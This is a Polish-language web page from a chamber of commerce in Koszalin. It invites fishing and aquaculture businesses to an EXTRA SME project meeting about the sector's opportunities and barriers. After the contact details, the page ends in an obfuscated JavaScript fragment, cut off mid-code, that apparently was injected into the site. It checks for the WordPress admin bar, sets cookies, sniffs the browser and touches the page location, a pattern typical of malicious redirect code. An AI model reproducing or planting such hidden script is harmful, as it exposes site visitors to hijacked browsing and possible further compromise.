Szanse i zagrożenia branży rybołówstwa w Polsce | Północna Izba Gospodarcza w Koszalinie

Północna Izba Gospodarcza w Koszalinie przystąpiła do projektu EXTRA SME, której celem jest wsparcie branży akwakultury, poprawa polityki mającej na celu zwiększenie konkurencyjności MŚP na obszarach przybrzeżnych i wiejskich UE, promowanie na rynkach UE produktów polskich oraz uproszczenia administracyjne sprzyjające rozwojowi branży.

Zapraszamy przedsiębiorców z branży przetwórstwa rybnego, hodowców ryb, instytucji okołobiznesowych ze sfery rybołówstwa na spotkanie, które odbędzie się 5 października (sobota) o godzinie 11: 00 w Restauracji Młyńskiej w Koszalinie ul. Młyńska 33. Tematem spotkania będzie „Szanse i zagrożenia rozwoju branży rybołówstwa w Polsce”.
W czasie posiedzenia chcielibyśmy omówić aktualną sytuację rybołówstwa na Pomorzu oraz bariery dla przedsiębiorców z branży akwakultury.

Na spotkanie zaprosiliśmy przedstawicieli Ministerstwa Gospodarki Morskiej i Żeglugi Śródlądowej, Europarlamentarzystów oraz przedstawicieli Wydziału Rolnictwa i Rybactwa Urzędu Marszałkowskiego Województwa Zachodniopomorskiego.

Dotychczasowy raport po spotkaniu do pobrania: Raport z I spotkania Extra SME – 28 sierpnia 2019

Prosimy o potwierdzenie przybycia mailowo na adres koszalin@izba.info lub telefonicznie do biura Północnej Izby Gospodarczej w Koszalinie 94 341 10 83. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m